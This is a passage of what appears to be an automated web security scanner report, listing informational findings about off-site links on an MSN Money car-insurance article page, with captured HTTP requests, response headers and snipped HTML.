P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 15:08:15 GMT
ntCoent-Length: 71670
Content-Length: 71670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296400095&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2F%3F4ae1b&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=abfFFnGL&amp;resize=false" class="opennew">Please tell us what you think</a>
...[SNIP]...
<div style="float:right;width:116px"><a href="http://money.bundle.com/article/study-women-aim-lower-get-paid-less" class="opennew"><img class="portrait" src="http://colstb.msn.com/i/3D/A8BEF8A967A8C44EBA529DF4AF21A.jpg" width="116" height="175" alt="Image: Woman with computer .. Jose Luis Pelaez/Getty Images" />
...[SNIP]...
<div style="margin-right:116px; padding-right: 10px;"><a href="http://money.bundle.com/article/study-women-aim-lower-get-paid-less" class="opennew"><strong>
...[SNIP]...
<div><a href="http://money.bundle.com/categories/" class="opennew"><strong>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/category/NFCC-ask-debt-expert/" class="opennew">Ask a Debt Expert</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/category/market-talk/" class="opennew">Market Talk</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/articles/politics-and-market/" class="opennew">Politics &amp; the Markets</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/articles/smart-spending/" class="opennew">Smart Spending</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/category/women-in-red/" class="opennew">Women in Red</a>
...[SNIP]...
<li class="ter"><a href="http://money.bundle.com/articles/your-money/" class="opennew">Your Money</a>
...[SNIP]...
<div style="float:left;width:116px"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnmn42482&amp;sc_extcmp=JS_2482_money"><img class="portrait" src="http://colstb.msn.com/i/5B/38F85A194EABD1A7A4FE824D213B14.jpg" width="116" height="175" alt="Woman choosing library books (.. Brand X Pictures/Getty Images)" />
...[SNIP]...
<div style="margin-left:116px; padding-left: 10px;"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnmn42482&amp;sc_extcmp=JS_2482_money"><strong>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2487-Leadership-Management-10-tips-for-managing-the-Facebook-generation/?SiteId=cbmsnmn42487&amp;sc_extcmp=JS_2487_money">Tips for managing 'the Facebook generation'</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2484-Salaries-Promotions-What-popular-TV-can-teach-you-about-professional-success/?SiteId=cbmsnmn42484&amp;sc_extcmp=JS_2484_money">What TV can teach you about professional success </a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2486-Leadership-Management-How-not-to-motivate-employees-10-management-habits-to-break-now/?SiteId=cbmsnmn42486&amp;sc_extcmp=JS_2486_money">10 management habits to break now</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2481-Cover-Letters-Resumes-How-to-personalize-your-cover-letter-and-get-the-hiring-managers-attention/?SiteId=cbmsnmn42481&amp;sc_extcmp=JS_2481_money">How to personalize your cover letter</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2480-Workplace-Issues-Lets-do-lunch-Why-a-midday-break-may-make-you-a-better-employee/?SiteId=cbmsnmn42480&amp;sc_extcmp=JS_2480_money">How a lunch break makes you a better employee</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2477-Career-Growth-and-Change-Career-catch-22-How-do-you-get-experience-if-nobody-will-hire-you-without-any/?SiteId=cbmsnmn42477&amp;sc_extcmp=JS_2477_money">No experience? A career catch-22</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2461-Job-Info-and-Trends-I-cant-believe-I-get-paid-to-do-this/?SiteId=cbmsnmn42461&amp;sc_extcmp=JS_2461_money">"I can't believe I get paid to do this"</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&amp;form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&amp;form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&amp;form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&amp;form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&amp;form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&amp;form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=abfFFnGL&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.174. http://money.redacted/auto-insurance/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /auto-insurance/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:56:14 GMT
Content-Length: 149556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410174&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<i>&#160;comes from&#160;Barbara Marquand&#160;at <a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/">CarInsurance.com</a>
...[SNIP]...
<p><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif" alt="CarInsurance.com on MSN Money" class="imagefloatright userImage lead" /></a>In the wake of recent news that the <a href="http://www.bing.com/search?q=zodiac+calendar&amp;form=MSMONY" title="http://www.bing.com/search?q=zodiac+calendar&amp;form=MSMONY">zodiac calendar</a> requires updating, <a href="http://www.bing.com/search?q=allstate+insurance&amp;FORM=MSMONY" title="http://www.bing.com/search?q=allstate+insurance&amp;FORM=MSMONY">Allstate Insurance</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Virgo+Horoscope&amp;FORM=MSMONY" title="http://www.bing.com/search?q=Virgo+Horoscope&amp;FORM=MSMONY">Virgos</a>
...[SNIP]...
<p>People born under the sign were almost seven times more likely to be in a car accident last year when compared to <a href="http://www.bing.com/search?q=scorpio+Horoscope&amp;form=MSMONY" title="http://www.bing.com/search?q=scorpio+Horoscope&amp;form=MSMONY">Scorpios</a>
...[SNIP]...
<p>The "new" sign, <a href="http://www.bing.com/search?q=Ophiuchus+Horoscope&amp;form=MSMONY" title="http://www.bing.com/search?q=Ophiuchus+Horoscope&amp;form=MSMONY">Ophiuchus</a>
...[SNIP]...
</b><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><b>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx" title="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx">Auto insurance companies try to stand out from the crowd</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx" title="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx">The 5 most dangerous cars around</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx" title="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx">Cars that attract the ladies</a>
...[SNIP]...
);" href="http://money.msn.com/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&amp;GT1=33004&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ef="http://money.redacted/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&amp;GT1=33004&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X0d9z5coaqCKBpjumajGaPp3wO_VSu4YR?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XEdI4lPH5YXQoFdzX6dolUuJi4zgESkkx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X_8ey5stO4VZuowOF1vLLqcSOHTm1zM-b?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-65309922ddd6d53b.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">tyler coghill</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-65309922ddd6d53b.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mNepHp8dR3BaNz273vmz1qC7k6Dr5UxqZumLTSkdmN_tUOubTVlnmMKrArPgUcaisLvPkNqvfzjWEn0neZZmWqw" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGF82iL2owd0niRqXndlsObUL4TDaFSUS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Jason Halliburton
..(xBWOMPx)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mviPxdqnTcFn7a679zN5TVH1DDZxWNbV6WUNG3lxcobNMaiLBTOorg0uNGOOxD8cwRpSBxTa-v1hTG9p826dosA" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XjEOTPvlDhopN8tJV9ggDXge6VoBpROKr?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XDDuwokFY_SngegAzwydGUhlRy0U6SVbz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSJ_NuxgD9S-NsAGt9iez06YT1T3z4bIy?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XxUooOtG0aQGn7lmyRZ521lfgFNbwT85r?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XrMHqap29l6sPXPOau00RiJSjNjxfDcg2?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVAn9safTFrPEMR0pgIqDmO_jTEmXlT_g?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Barbara Searles Labelle
..(law abiding631)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbSfkbl2R0BF4ZqaDkpm7f95iLMWvx8bJ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Someone
..(wishful45)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Malcolm Walker
..(gridnight)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1m0FdnXk-Vjv78jlRgRJo9T1sIoZzPSsi5ODGnPoiX1tRqiM-j-cc9RSyn230Rb5ItlC4mQYzpf0i3HojYGwGR0Q" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XfJjjOLLsjhdTb4kuGZBLAKdqdVvOwtuc?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XsnDaHHPT68CsmSvtVijsfPyAWKHkeltN?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X3e-um2PQYYhgl12G1OQaJcxxr5hEWRbg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<div style="float:right;margin-left:100px" class="provided-by-insure"><a href="http://www.insure.com"><img src="http://moneycentral.redacted/content/data/partner-tools/auto-insurance-quotes_insure-logo.jpg" width="179" height="15" alt="insure" />
...[SNIP]...
<div class="insure-link" style="margin-right:20px; margin-top:-2px;"><a href="http://www.insure.com">Car insurance quotes</a>
...[SNIP]...
<li class="first"><a href="http://www.insure.com/car-insurance/policy-save.html"> How to save money on car insurance</a>
...[SNIP]...
<li><a href="http://www.insure.com/car-insurance/driver-distractions.html"> 10 most dangerous foods to eat while driving</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&amp;form=money3">Do car insurance rates fall at a certain age?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&amp;form=money3">Does car insurance cover the car or the person?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&amp;form=money3">What happens if I have an accident and no car insurance?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&amp;form=money3">What cars are considered high risk?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+sr22+insurance&amp;form=money3">What is an SR-22 policy?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=what+is+gap+insurance&amp;form=money3">What is gap insurance?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&amp;sc_extcmp=JS_2482_home1&amp;ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&amp;resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.175. http://money.redacted/auto-insurance/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://money.redacted
Path:   /auto-insurance/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=a03f55ae3d164d5598bc3697848c6072; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 16:51:18 GMT
Content-Length: 149602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&amp;mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406278&amp;rver=6.1.6195.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&amp;lc=1033&amp;id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<i>&#160;comes from&#160;Barbara Marquand&#160;at <a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/">CarInsurance.com</a>
...[SNIP]...
<p><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif" alt="CarInsurance.com on MSN Money" class="imagefloatright userImage lead" /></a>In the wake of recent news that the <a href="http://www.bing.com/search?q=zodiac+calendar&amp;form=MSMONY" title="http://www.bing.com/search?q=zodiac+calendar&amp;form=MSMONY">zodiac calendar</a> requires updating, <a href="http://www.bing.com/search?q=allstate+insurance&amp;FORM=MSMONY" title="http://www.bing.com/search?q=allstate+insurance&amp;FORM=MSMONY">Allstate Insurance</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Virgo+Horoscope&amp;FORM=MSMONY" title="http://www.bing.com/search?q=Virgo+Horoscope&amp;FORM=MSMONY">Virgos</a>
...[SNIP]...
<p>People born under the sign were almost seven times more likely to be in a car accident last year when compared to <a href="http://www.bing.com/search?q=scorpio+Horoscope&amp;form=MSMONY" title="http://www.bing.com/search?q=scorpio+Horoscope&amp;form=MSMONY">Scorpios</a>
...[SNIP]...
<p>The "new" sign, <a href="http://www.bing.com/search?q=Ophiuchus+Horoscope&amp;form=MSMONY" title="http://www.bing.com/search?q=Ophiuchus+Horoscope&amp;form=MSMONY">Ophiuchus</a>
...[SNIP]...
</b><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><b>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx" title="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx">Auto insurance companies try to stand out from the crowd</a>
...[SNIP]...
